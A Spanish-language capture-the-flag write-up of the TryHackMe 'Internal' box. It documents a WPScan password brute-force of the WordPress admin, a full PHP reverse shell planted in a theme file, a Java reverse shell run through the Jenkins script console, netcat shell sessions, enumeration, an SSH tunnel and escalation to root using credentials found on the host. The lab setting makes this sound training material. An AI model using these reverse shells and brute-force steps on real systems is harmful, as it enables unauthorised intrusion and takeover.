CONCLUSION: TUVIMOS PROBLES PROBLEMAS A LA HORA DE INTERSEPTAR LA SOLICIITUD REQUEST CON BURPSUITE, WIRESHARK, TSHARK, Y TCPDUMP (calculo por la tunelizacion tendria que configurard e otra forma el proxy), POR LO TANTO CONSEGUIIMOSLA REQUEST A TRAVES DE LAS HERRAMIENTAS DE DESARROLLADOR DEL BROWSER y LAS USAMOS CON EL COMANDO DE HYDRA, Y BINGO PARECE QUE CON EL USUARIO ADMIN TAMBIEN TENEMOS INGRESO Y CONSEGUIMOS EL PASSWD DEL PANEL DE JENKINS QUE CORRE LOCALMENTE EN LA MAQUINA INSTERNAL Y LO ESTAMOS VIENDO POR LA TUNELIZACION, ESTAS SON LAS CREDENCIALES: host: localhost login: admin password: spongebob Y CONSEGUIMOS INGRESAR AL PANEL DE JENKINS (Jenkins 2.250) CON EXITO PAPA.!!

WPSCAN👈 --------------------------------->https://wpscan.com/register/

wpscan --url http://internal.thm/blog/wp-login.php --usernames admin --passwords 
/usr/share/wordlists/rockyou.txt
_______________________________________________________________
     __          _______   _____
     \ \        / /  __ \ / ____|
      \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
       \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
        \  /\  /  | |     ____) | (__| (_| | | | |
         \/  \/   |_|    |_____/ \___|\__,_|_| |_|

     WordPress Security Scanner by the WPScan Team
                     Version 3.8.22
   Sponsored by Automattic - https://automattic.com/
   @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
  _______________________________________________________________

[+] URL: http://internal.thm/blog/wp-login.php/ [10.10.252.207]
[+] Started: Tue Feb 27 23:49:19 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://internal.thm/blog/wp-login.php/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] This site seems to be a multisite
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | Reference: http://codex.wordpress.org/Glossary#Multisite

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-login.php/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)
 |  - http://internal.thm/blog/wp-includes/css/dashicons.min.css?ver=5.4.2
 | Confirmed By:
 |  Common Wp Includes Query Parameter In Homepage (Passive Detection)
 |   - http://internal.thm/blog/wp-includes/css/buttons.min.css?ver=5.4.2
 |   - http://internal.thm/blog/wp-includes/js/wp-util.min.js?ver=5.4.2
 |  Query Parameter In Install Page (Aggressive Detection)
 |   - http://internal.thm/blog/wp-includes/css/dashicons.min.css?ver=5.4.2
 |   - http://internal.thm/blog/wp-includes/css/buttons.min.css?ver=5.4.2
 |   - http://internal.thm/blog/wp-admin/css/forms.min.css?ver=5.4.2
 |   - http://internal.thm/blog/wp-admin/css/l10n.min.css?ver=5.4.2

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:02 <=================================================> (137 / 137) 
 100.00% Time: 00:00:02

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / my2boys                                                                                                     
Trying admin / lizzy Time: 00:00:46 <                                                  > (3885 / 14348277)  
0.02%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: my2boys

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Feb 27 23:50:14 2024
[+] Requests Done: 4204
[+] Cached Requests: 4
[+] Data Sent: 1.477 MB
[+] Data Received: 20.56 MB
[+] Memory used: 231.629 MB
[+] Elapsed time: 00:00:54

CONCLUSION: BINGO VIMOS QUE WPSCAN TINE OPCION DE REALIZAR FUERZA BRUTA A LOGINNS DE WORPRESS, LO HICIMOS CON EL USUARIOO ADMIN; Y NOS DIO UNAS CREDENCIALES, SE TENZO: Username: admin, Password: my2boys, luego buscando algun metodo de entrada de scriprt o subidad e archivos para traar de lograr cargar un payload para un areverseshell vemos que podemos editar en THEME (http://internal.thm/blog/wp-admin/theme-editor.php?file=front-page.php&theme=twentyseventeen) el index.php principal del sitio veremos de cargar nuestra carga util aqui y hacer un llamado a la URL luego para ver siu pòdemos escuchar la reverse shell con nuestro netcat.

🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧

🛠️ SCRIPT DE EXPLOIT Y PAYLOADS ✔️

SCRIPT DE EXPLOIT Y PAYLOADS

HACKTOOL👈 --------------------------------->https://www.paimon.com.ar/

// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.95.35';  // You have changed this
$port = 4444;  // And this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();

if ($pid == -1) {
  printit("ERROR: Can't fork");
  exit(1);
}

if ($pid) {
  exit(0);  // Parent exits
}

// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
  printit("Error: Can't setsid()");
  exit(1);
}

$daemon = 1;
} else {
printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}

// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
// Check for end of TCP connection
if (feof($sock)) {
  printit("ERROR: Shell connection terminated");
  break;
}

// Check for end of STDOUT
if (feof($pipes[1])) {
  printit("ERROR: Shell process terminated");
  break;
}

// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
  if ($debug) printit("SOCK READ");
  $input = fread($sock, $chunk_size);
  if ($debug) printit("SOCK: $input");
  fwrite($pipes[0], $input);
}

// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
  if ($debug) printit("STDOUT READ");
  $input = fread($pipes[1], $chunk_size);
  if ($debug) printit("STDOUT: $input");
  fwrite($sock, $input);
}

// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
  if ($debug) printit("STDERR READ");
  $input = fread($pipes[2], $chunk_size);
  if ($debug) printit("STDERR: $input");
  fwrite($sock, $input);
}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
  print "$string
";
}
}

CONCLUSION: NOSCREAMOS RAPIDO ESTA REVERSE SHELL DE PHP CON HACKTOOL Y LA PEGAMOS DENTRO DEL HTML SCRIPT DEL HOMPAGE DEL SITIO WEB INTERNAL Y LLAMAMOS A LA URL OBTENIENDO LA REVERSE SHELL, TENZANDOCE LA COSA.

GPT SCRIPT CONSOLA JENKINS👈 --------------------------------->https://www.paimon.com.ar/

def comando = 'whoami'
def proceso = comando.execute()
proceso.waitFor()

def salida = proceso.text
println("Resultado de 'ls':")
println(salida)

CONCLUSION:

GITHUB BUSQUEDA SCRIPT REVERSE SHELL👈 --------------------------------->https://www.paimon.com.ar/


String host = "10.10.132.103";
int port = 4444;
String cmd = "/bin/bash"; // Cambiar cmd.exe por /bin/bash para Linux
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try {
        p.exitValue();
        break;
    } catch (Exception e) {}
}
p.destroy();
s.close();

CONCLUSION: CONSEGUIMOS UN SCRIPT QUE MODIFICAMOS LA SHELL , NUESTRA IP ATACANTE Y PUERTO POR DONDE ESCUCHAMOS CON NETCAT Y BINGO CONSEGUIMOS LA REVERSE SHELL.

🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥

🤯 EXPLOTACION ✔️

EXPLOTACION

NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL

┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.95.35] from (UNKNOWN) [10.10.252.207] 35178
Linux internal 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 01:08:23 up  2:56,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
internal
$ cat /proc/version
Linux version 4.15.0-112-generic (buildd@lcy01-amd64-027) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) 
#113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020
$ cat /etc/issue
Ubuntu 18.04.4 LTS \n \l
$ cd home
$ ls
aubreanna
$ cd aubreanna
/bin/sh: 14: cd: can't cd to aubreanna
$ ls aubreanna
ls: cannot open directory 'aubreanna': Permission denied
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
aubreanna:x:1000:1000:aubreanna:/home/aubreanna:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

$ ip route
default via 10.10.0.1 dev eth0 proto dhcp src 10.10.252.207 metric 100 
10.10.0.0/16 dev eth0 proto kernel scope link src 10.10.252.207 
10.10.0.1 dev eth0 proto dhcp scope link src 10.10.252.207 metric 100 
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 

$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:37911         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 10.10.252.207:35178     10.10.95.35:4444        ESTABLISHED off (0.00/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::80                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 10.10.252.207:80        10.10.95.35:54640       TIME_WAIT   timewait (25.33/0/0)
tcp6       0      0 10.10.252.207:80        10.10.95.35:59954       ESTABLISHED keepalive (5680.64/0/0)
udp        0      0 127.0.0.53:53           0.0.0.0:*                           off (0.00/0/0)
udp        0      0 10.10.252.207:68        0.0.0.0:*                           off (0.00/0/0)
raw6       0      0 :::58                   :::*                    7           off (0.00/0/0)

$ curl http://localhost:8080
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                             Dload  Upload   Total   Spent    Left  Speed
100   793  100   793<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2F'/>    
<script>window.location.replace('/login?from=%2F');</script></head><body style='background-color:white; 
color:white;'>


Authentication required
<!--
You are authenticated as: anonymous
Groups that you are in:
  
Permission you need to have (but didn't): hudson.model.Hudson.Read
 ... which is implied by: hudson.security.Permission.GenericRead
 ... which is implied by: hudson.model.Hudson.Administer
-->

</body></html> 

$ find / -writable -type d 2>/dev/null
/proc/2830/task/2830/fd
/proc/2830/fd
/proc/2830/map_files
/run/screen
/run/lock
/run/lock/apache2
/dev/mqueue
/dev/shm
/tmp
/var/tmp
/var/cache/tcpdf
/var/cache/apache2/mod_cache_disk
/var/www/html/wordpress/wp-content/themes/twentytwenty/template-parts
/var/www/html/wordpress/wp-content/themes/twentytwenty/inc
/var/www/html/wordpress/wp-content/themes/twentytwenty/classes
/var/www/html/wordpress/wp-content/themes/twentytwenty/templates
/var/www/html/wordpress/wp-content/themes/twentytwenty/assets
/var/www/html/wordpress/wp-content/themes/twentyseventeen/template-parts
/var/www/html/wordpress/wp-content/themes/twentyseventeen/inc
/var/www/html/wordpress/wp-content/themes/twentyseventeen/assets
/var/crash
/var/lib/wordpress/wp-content
/var/lib/wordpress/wp-content/themes
/var/lib/lxcfs/proc
/var/lib/lxcfs/cgroup
/var/lib/php/sessions
/var/lib/phpmyadmin/tmp

$ find / -perm -u=s -type f 2>/dev/null
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/bin/mount
/bin/umount
/bin/ping
/bin/fusermount
/bin/su
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/pkexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

$ ls -la mnt
total 8
drwxr-xr-x  2 root root 4096 Feb  3  2020 .
drwxr-xr-x 24 root root 4096 Aug  3  2020 ..
$ ls -la opt
total 16
drwxr-xr-x  3 root root 4096 Aug  3  2020 .
drwxr-xr-x 24 root root 4096 Aug  3  2020 ..
drwx--x--x  4 root root 4096 Aug  3  2020 containerd
-rw-r--r--  1 root root  138 Aug  3  2020 wp-save.txt
$ cat /opt/wp-save.txt
Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna:bubb13guM!@#123

CONCLUSION: BINGO OBTUVIMOS LA REVERSE SHELL DE INTERNAL EN WORDPRESS PERO COMO EL USUARIO WWW-DATA VAMOS A SEGUIR... EN TODA LA INFO ENUMERADA LLAMA LA ATENCION UNA INTERFACE DE DOCKER SOLO PARA TENER EN CUENTA, CON NETSTAT VIMOS SERVICIOS MONTADOS POR VARIOS PUERTOS SOLO NOS DEVOLVIO CON CURL ALGO DE UN POSIBLE LOGIN EL QUE ESTABA CORRIENDO EN SU LOCALHOST POR EL PUERTO 8080 POR EL MOMENTO NO PUDIMOS VER LA PAGINA DESDE MAQUINA ATACANTE. LUEGO ENUMERANDO Y VIENDO VARIIOIS DIRECTORIOS EN /OPT ENCONTRAMOS UN ARCHIVO LLAMADO WP-SAVE.TXT IMPORTANTE APARENTEMENTE Y VIMOS UN MENSAJE CON ESTAS CREDENCIALES DEL USUARIO AUBREANNA SE VA TENZANDO MAS LA COSA: aubreanna:bubb13guM!@#123 y LUEGO PROBAMOS CON ESTAS CREDENCIALES POR SSH Y BINGO YA ESTAMOS COMO AUBREANNA .

NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL

┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.132.103] from (UNKNOWN) [10.10.112.117] 40476
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
whoami
jenkins
ls home
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
ls root
ls: cannot open directory 'root': Permission denied
ls tmp
hsperfdata_jenkins
hsperfdata_root
jetty-0_0_0_0-8080-war-_-any-2385313934447407628.dir
jetty-0_0_0_0-8080-war-_-any-7115445266796347992.dir
winstone4805797399595250733.jar
winstone7166027169177973699.jar
winstone949073167922835362.jar
ls  opt
note.txt
cd opt
ls
note.txt
cat note.txt
Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you 
need access to the root user account.

root:tr0ub13guM!@#123

CONCLUSION: PERFECTO LUEGO DE CONSEGUIR UNA REVERSE SHELL AHORA DESDE EL PANEL DE SCRIPT ADMIN DE JENKINS CONSEGUIMOS LA REVERSE SHELL Y ENNUMERANDO DIRECTORIOS VIMOS UN ARCHIVO NOTE.TXT EN EL DIRECTORIO /OPT DE NUEVO, Y ESTE TENIA APARENTEMENTE AHORA LAS CREDENCIALES DE ROOT PARA SSH Y SE TENZO DEL TODO SEGURO (root:tr0ub13guM!@#123).

SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL

┌──(root㉿kali)-[~]
└─# ssh aubreanna@10.10.252.207
The authenticity of host '10.10.252.207 (10.10.252.207)' can't be established.
ED25519 key fingerprint is SHA256:seRYczfyDrkweytt6CJT/aBCJZMIcvlYYrTgoGxeHs4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.252.207' (ED25519) to the list of known hosts.
aubreanna@10.10.252.207's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Feb 28 02:04:32 UTC 2024

  System load:  0.0               Processes:              111
  Usage of /:   63.8% of 8.79GB   Users logged in:        0
  Memory usage: 46%               IP address for eth0:    10.10.252.207
  Swap usage:   0%                IP address for docker0: 172.17.0.1

  => There is 1 zombie process.


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.


Last login: Mon Aug  3 19:56:19 2020 from 10.6.2.56
aubreanna@internal:~$ whoami
aubreanna
aubreanna@internal:~$ ls
jenkins.txt  snap  user.txt
aubreanna@internal:~$ cat user.txt
THM{int3rna1_fl4g_1}

aubreanna@internal:~$ cat jenkins.txt 
Internal Jenkins service is running on 172.17.0.2:8080

find / -type f -name *.txt 2>/dev/null
/opt/wp-save.txt
/boot/grub/gfxblacklist.txt
/var/www/html/wordpress/license.txt
/var/www/html/wordpress/wp-includes/images/crystal/license.txt
/var/www/html/wordpress/wp-includes/ID3/readme.txt
/var/www/html/wordpress/wp-includes/ID3/license.txt
/var/www/html/wordpress/wp-includes/ID3/license.commercial.txt
/var/www/html/wordpress/wp-includes/js/plupload/license.txt
/var/www/html/wordpress/wp-includes/js/swfupload/license.txt
/var/www/html/wordpress/wp-includes/js/tinymce/license.txt
/var/www/html/wordpress/wp-content/plugins/akismet/readme.txt
/var/www/html/wordpress/wp-content/plugins/akismet/changelog.txt
/var/www/html/wordpress/wp-content/plugins/akismet/LICENSE.txt
/var/www/html/wordpress/wp-content/themes/twentytwenty/readme.txt
/var/www/html/wordpress/wp-content/themes/twentyseventeen/readme.txt
/var/www/html/wordpress/wp-content/themes/twentynineteen/readme.txt
/home/aubreanna/user.txt
/home/aubreanna/jenkins.txt
/usr/share/doc/phpmyadmin/html/_sources/require.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/developers.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/intro.txt
/usr/share/doc/phpmyadmin/html/_sources/config.txt
/usr/share/doc/phpmyadmin/html/_sources/setup.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/import_export.txt
/usr/share/doc/phpmyadmin/html/_sources/user.txt
/usr/share/doc/phpmyadmin/html/_sources/credits.txt
/usr/share/doc/phpmyadmin/html/_sources/transformations.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/glossary.txt
/usr/share/doc/phpmyadmin/html/_sources/intro.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/transformations.txt
/usr/share/doc/phpmyadmin/html/_sources/privileges.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/config.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/user.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/copyright.txt
/usr/share/doc/phpmyadmin/html/_sources/copyright.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/import_export.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/faq.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/require.txt
/usr/share/doc/phpmyadmin/html/_sources/privileges.txt
/usr/share/doc/phpmyadmin/html/_sources/other.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/index.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/vendors.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/glossary.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/setup.txt
/usr/share/doc/phpmyadmin/html/_sources/credits.rst.txt
/usr/share/doc/phpmyadmin/html/_sources/developers.txt
/usr/share/doc/phpmyadmin/html/_sources/vendors.txt
/usr/share/doc/phpmyadmin/html/_sources/other.txt
/usr/share/doc/phpmyadmin/html/_sources/index.txt
/usr/share/doc/phpmyadmin/html/_sources/faq.txt

CONCLUSION:PERFECTO PROBAMOS LAS CREDENCIALES DE AUBREANNA EN SSH Y ENTRO DE UNA, Y PUDIMOS LEER LA BANDERA, COMO TAMBIEN VIMOS LO QUE SOSPECHABAMOS DE UN SERVIDOR MONTADO POR EL PUERTO 8080 QUE NO SABIAMOS EL NOMBRE Y APARENTEMENTE CORRE JENKINS EN EL, EN SU LOCALHOST, PROFUNDISAREMOS EN ESTO. LUEGO VERIFICANDO LOS DIRECTORIOS EN /OPT CONSEGUIMOS SU BANDERA THM{int3rna1_fl4g_1} :D

SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
┌──(root㉿kali)-[~]
└─# ssh -L 8082:localhost:8080 -N -f -l aubreanna 10.10.252.207
aubreanna@10.10.252.207's password: 

URL y ENTRAMOS AL LOGINS JENKINS :D  :
http://localhost:8082/login?from=%2F
```
luegodetunelizarconsshennuestramaquinaatacantevemoslogindejenkins
- CONCLUSION: CONSEGUIMOS TUNELIZAR GRACIAS AL PDF NUESTRO DE TUNELIZACION CON SSH Y COMO SABIEAMOS QUE TENIAMOS ESE SERVICIO LOCALMENTE DE JENKINS CORRIENDO EN LA ;MAQUIN AINTERNAL; DESDE NUESTRA MAQUINA ATACANTE CON SSH LOGRAMOS REALIZAR UNA TUNELIZACION DE SU LOCALHOST POR EL PUERTO 8080A NUESTRO PUERTO 8082 Y LOGRAMOS NTRAR AL PANEL DE LOGIN DE JENKINS VAMOS A PROBAR RAPIDO SI PODEMOS HACER FUERSZA BRUTA CON HYDRA y SI NO VEREMOS DE CONTINUES lUEGO, POR QUE POR EL MOMENTO NO TENEMOS MAS CREDENCIALES AUE ADMIN Y AUBREANNA..

SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL

┌──(root㉿kali)-[~]
└─# ssh root@10.10.112.117     
root@10.10.112.117's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Feb 28 21:47:51 UTC 2024

  System load:  0.0               Processes:              115
  Usage of /:   63.7% of 8.79GB   Users logged in:        0
  Memory usage: 38%               IP address for eth0:    10.10.112.117
  Swap usage:   0%                IP address for docker0: 172.17.0.1

  => There is 1 zombie process.


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Aug  3 19:59:17 2020 from 10.6.2.56
root@internal:~# ls
root.txt  snap
root@internal:~# whoami
root
root@internal:~# cat root.txt
THM{d0ck3r_d3str0y3r}

CONCLUSION: PERFECTO SOMOS ROOT CON ESTAS CREDENCIALES QUE ENCONTRAMOS EN JENKINS Y NOS CONECTAMOS POR SSH, SE TENZO Y RESOLVIMOS LA MAQUINA ENCONTRANDO DE NUEVO LA BANDERA EN DIRECTORIO /OPT THM{d0ck3r_d3str0y3r}

⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔

💠 ESCALADA DE PRIVILEGIOS WINDOWS ❌

ESCALADA DE PRIVILEGIOS WINDOWS

NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
